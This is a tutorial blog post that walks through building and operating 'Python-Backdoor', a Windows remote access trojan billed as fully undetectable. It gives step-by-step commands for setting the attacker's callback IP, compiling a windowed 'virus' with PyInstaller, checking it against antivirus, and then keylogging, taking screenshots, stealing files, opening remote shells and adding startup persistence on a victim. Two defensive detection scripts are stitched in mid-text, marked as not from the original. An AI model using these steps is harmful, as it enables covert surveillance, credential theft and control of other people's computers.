Introduction


Python-Backdoor is a fully undetectable backdoor written entirely in Python with the main purpose of contributing to the cybersecurity field. It is rich in features, and although its server can be operated from the whole range of well-known operating systems, it targets Windows machines.

Having tested this cyber weapon in my own lab, I came to the conclusion that such a tool is worth sharing with anyone who is passionate about computer security or penetration testing.

Features

  • Multi-client support
  • Cross-platform server
  • Built-in keylogger
  • Ability to send commands to all clients
  • Ability to capture screenshots
  • Ability to upload/download files
  • Ability to send messages
  • Ability to run at startup
  • Ability to browse files
  • Ability to dump user info
  • Ability to open remote cmd
  • Ability to open remote python interpreter
  • Ability to disable task manager
  • Ability to shutdown/restart/lock pc
  • Ability to melt file on startup

How to set up the Python-Backdoor in your own lab

According to the official documentation shared on the author's GitHub page, Python-Backdoor requires Python 3.6 or Python 3.7. Building the client requires a Windows box.

Download the project from the official repository

Run the following command to download the source code for the Python-Backdoor.
git clone https://github.com/xp4xbox/Python-Backdoor.git

Create a virtual environment and install the requirements

Before installing the Python packages required by the project, create a fresh virtual environment inside the project's root directory.
cd Python-Backdoor
virtualenv -p /usr/local/bin/python3.7 env
Once you have created the virtual environment, install the requirements with the following commands.
source env/bin/activate # activate the virtual environment
pip install -r requirements.txt

Set up the victim machine

As for the victim machine, I am going to set up a Windows 10 operating system in my VirtualBox. Not only am I going to infect it, but I am also going to use it for building the client.

Make sure to have Python 3.7 or 3.8 installed on the target machine.

Generate the virus

Once you have downloaded the Python-Backdoor on your Windows machine, navigate to it and run the following command to install the requirements.
pip install -r requirements.txt
Then edit the following line in client.py with the server's IP address so the virus connects to the server.
strHost = "127.0.0.1"


Then run the following command to finally generate the executable virus.
pyinstaller client.py --exclude-module FixTk --exclude-module tcl --exclude-module tk --exclude-module _tkinter --exclude-module tkinter --exclude-module Tkinter --onefile --windowed


If everything goes fine, you can locate the client under the dist subdirectory of the project.

Scan the virus client

It is always a good idea to scan the client with all the antivirus products available on the target machine; for the purpose of this tutorial I am scanning the fresh client with Microsoft Defender.
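An antivirus verdict is only one signal. The build command above uses PyInstaller with --windowed, so the result is a Windows GUI-subsystem executable with a PyInstaller archive appended, and both traits can be checked statically. The following is an added triage example, not code from the original post or from the Python-Backdoor project; the function names and the sample bytes are constructed for illustration.

```python
import struct

PYI_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"  # magic that opens a PyInstaller archive cookie
COOKIE = struct.Struct("!8sIIII64s")    # magic, pkg length, TOC offset, TOC length, pyvers, pylib
GUI_SUBSYSTEM = 2                       # IMAGE_SUBSYSTEM_WINDOWS_GUI, what --windowed produces

def pe_subsystem(data):
    """Return the Subsystem field of the PE optional header, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    opt = pe_off + 24                   # PE signature (4 bytes) + COFF header (20 bytes)
    if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < opt + 70:
        return None
    return struct.unpack_from("<H", data, opt + 68)[0]  # same offset in PE32 and PE32+

def pyinstaller_cookie(data):
    """Parse the last PyInstaller cookie in the file, or return None."""
    idx = data.rfind(PYI_MAGIC)
    if idx < 0 or idx + COOKIE.size > len(data):
        return None
    _, pkg_len, _, _, pyvers, pylib = COOKIE.unpack_from(data, idx)
    return {"pkg_len": pkg_len, "pyvers": pyvers,
            "pylib": pylib.rstrip(b"\0").decode("ascii", "replace")}

def triage(data):
    """Flag for review (not as malicious) a windowed PyInstaller bundle."""
    subsystem, cookie = pe_subsystem(data), pyinstaller_cookie(data)
    return {"pe": subsystem is not None, "windowed": subsystem == GUI_SUBSYSTEM,
            "pyinstaller": cookie, "review": bool(cookie) and subsystem == GUI_SUBSYSTEM}

def constructed_sample(subsystem):
    """Constructed stand-in for a build: minimal PE headers plus an appended cookie."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 68, subsystem)
    cookie = COOKIE.pack(PYI_MAGIC, COOKIE.size, 0, 0, 37, b"python37.dll")
    return dos + b"PE\0\0" + b"\0" * 20 + bytes(opt) + b"\0" * 32 + cookie

if __name__ == "__main__":
    print(triage(constructed_sample(GUI_SUBSYSTEM)))
```

Plenty of legitimate software is packaged the same way, so the review flag is a reason to look closer at an unexpected file, not a verdict.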

Start the server

Before running the client on the target machine, you must start the server. The following command does that.
python server.py # make sure to be inside the project, server side

Run the client on the target

Once you have launched the server on the host machine, go to the target machine and run the client as a normal program.

If everything goes fine, you should get a connection on the server side as shown below.

Interact with the connection

To interact with the connection, type the following command.
--i 0 # 0 is the id of the session

Get information on the user

Getting information on the user running the target machine can be achieved with the help of the following command.
--u

Take a screenshot on the target

Taking a screenshot on the victim machine is as easy as typing the following command on the server side.
--p

Start a keylogger on the target machine

To start a keylogger on the victim's machine, just type the following command.
--k start
When you're done, dump the logged data with the following command.
--k dump
The logged data is going to be printed out on the console.

Send a message to the user

The Python-Backdoor offers the option to troll the victim. This option is shown in the following command.
--m Hello from space

Download files from the target machine

To download files from the target machine, type the following command.
--r
Then provide the full path of the file you want to download.

Open a remote Python interpreter

It is also possible to run a Python interpreter on the remote machine. The following command does that.
--i 

Open a remote command prompt

To open a remote shell, type the following command.
--e

Add the rat to startup

This feature is extremely useful as it automatically triggers a connection back to the server each time the user restarts the target machine.
--a 1
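From the defender's side, the run-at-startup and disable-task-manager features in the list above leave registry writes that can be correlated per process. The following is an added detection example, not part of the original post or the project; it assumes the startup entry goes to a Run key and that Task Manager is disabled through the DisableTaskMgr policy value, the usual Windows mechanisms, which the page does not confirm for this tool. The event lines are constructed, using Sysmon registry-event field names.

```python
import re
from collections import defaultdict

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[^\\]+$", re.I)
TASKMGR = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr$", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public)\\", re.I)

# Constructed sample events (simplified "field=value|..." rendering, not real logs).
EVENTS = [
    r"Image=C:\Users\lab\Downloads\client.exe|TargetObject=HKU\S-1-5-21-1111"
    r"\Software\Microsoft\Windows\CurrentVersion\Run\updater"
    r"|Details=C:\Users\lab\AppData\Roaming\client.exe",
    r"Image=C:\Users\lab\Downloads\client.exe|TargetObject=HKU\S-1-5-21-1111"
    r"\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
    r"|Details=DWORD (0x00000001)",
    r"Image=C:\Program Files\Vendor\app.exe|TargetObject=HKU\S-1-5-21-1111"
    r"\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray"
    r'|Details="C:\Program Files\Vendor\app.exe" --tray',
    r"Image=C:\Windows\regedit.exe|TargetObject=HKU\S-1-5-21-1111"
    r"\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
    r"|Details=DWORD (0x00000000)",
]

def parse(line):
    """Split one constructed event line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split("|"))

def classify(event):
    """Name the suspicious behaviour a registry write represents, if any."""
    target, details = event["TargetObject"], event["Details"]
    if RUN_KEY.search(target) and USER_WRITABLE.search(details):
        return "startup-persistence"      # autorun pointing into a user-writable path
    if TASKMGR.search(target) and details.strip().lower() == "dword (0x00000001)":
        return "taskmgr-disabled"         # policy value switched on
    return None

def detect(lines):
    """Group findings by writing process; both behaviours together rate 'high'."""
    by_image = defaultdict(set)
    for event in map(parse, lines):
        finding = classify(event)
        if finding:
            by_image[event["Image"]].add(finding)
    return {image: ("high" if len(found) == 2 else "medium", sorted(found))
            for image, found in by_image.items()}

if __name__ == "__main__":
    print(detect(EVENTS))
```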

Restart the user's machine

The command to restart the user's machine is shown below.
--x 2 

Conclusion

Having covered the most important and useful features offered by the Python-Backdoor, it is up to you to further explore and see its abilities in live situations. Being fluent in Python, I find this cyber weapon truly easy to set up and operate.

Disclaimer: Education purposes only.

Copyright hackermilk.info
